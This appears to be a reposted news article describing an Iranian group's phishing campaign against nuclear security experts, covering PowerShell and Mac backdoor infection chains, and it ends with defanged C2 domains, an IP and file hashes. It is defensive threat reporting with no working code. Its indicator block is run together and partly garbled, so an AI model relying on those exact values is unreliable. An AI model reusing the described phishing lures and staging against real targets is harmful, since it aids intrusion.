Sunday, March 3, 2024

Charming Kitten Hackers Uses Weaponized MS Word Doc to Deploy Powershell Backdoor

Charming Kitten, also known as TA453, is an Iranian government-based cyberwarfare group that has conducted several attacks since 2017.

In the middle of May 2023, these threat actors sent a benign email posing as a Senior Fellow of the Royal United Services Institute (RUSI) regarding feedback for a project called “Iran in the Global Security Context.”

The email also consisted of other nuclear security experts which threat actors have contacted as part of credulous to the victims. The email accounts used for this email campaign are found to be created and not compromised.

Charming Kitten – Overview of their TTPs

After the initial email, the threat actors send Google script macros to their targets which redirects the victims to a Dropbox URL that consists of a password-encrypted .rar file (Abraham Accords & MENA.rar) and .LNK file (Abraham Accords & MENA.pdf.lnk).

Full-infection chain Source[Proofpoint]

Dropper and Additional Malware

The .LNK file (Abraham Accords & MENA.pdf.lnk) acts as the dropper which uses the Gorjol function and executes several PowerShell commands to establish connection to the C2 server. Once the connection is established, it downloads a base64 encoded .txt file (first Borjol function) from the server.

Once this Borjol function is decoded, the function communicates with the C2 located at fuschia-rhinestone.cleverapps[.]io to download another encrypted Borjol function (second Borjol function) that uses the same variables in the first Borjol function.

This second Borjol function decrypts the PowerShell Backdoor (GorjolEcho) that is used by threat actors to gain persistence in the system. This backdoor is initiated with a decoy PDF before the exfiltration of data to the C2. 

Mac Malware

As per the research from Proofpoint, the malware did not run on an Apple computer. However, a week after the initial communication, the threat actors sent another new infection chain that could also attack Mac operating systems.

This time they sent malware disguised as a RUSI VPN Solution, which executes an Apple script file and uses the curl command to download the function with the C2 (library-store[.]camdvr[.]org/DMPR/[alphanumeric string]) resolving to 144.217.129[.]176, an OVH IP.

Instead of a PowerShell backdoor, this time a bash script (NokNok) was used to gain persistence in the system.

Mac system infection chain

Indicators of Compromise

Indicator 464c5cd7dd4f32a0893b9fff412b52165855a94d193c08b114858430c26a9f1d ddead6e794b72af26d23065c463838c385a8fdffofb1b8940cd2c23c3569e43b1fb7f1bf97b72379494ea140c42d6ddd53f0a78ce22e9192cfba3bae58251dade98afa8550f81196e456c0cd4397120469212e190027e33a1131f602892b5f795dc7e84813f0dae2e72508d178aed241f8508796e59e33da63bd6b481f507026b6916b5980e79a2d20b4c433ad8e5e34fe9683ee61a42b0730effc6f056191ebacfa8a5306b702d610620a07040262538dd59820d5a42cf01fd9094ce5cc3487clibrary-store[.]Jcamdvrl[.Jorg 144.217.129[.]176 filemanager.theworkpc[.Jcom fuschia-rhinestone.cleverappsl.]io 

A complete detailed analysis of this threat group has been published by Proofpoint.

“AI-based email security measures Protect your business From Email Threats!” – Request a Free Demo.

The post Charming Kitten Hackers Uses Weaponized MS Word Doc to Deploy Powershell Backdoor appeared first on Cyber Security News.

   Read More 

Cyber Security News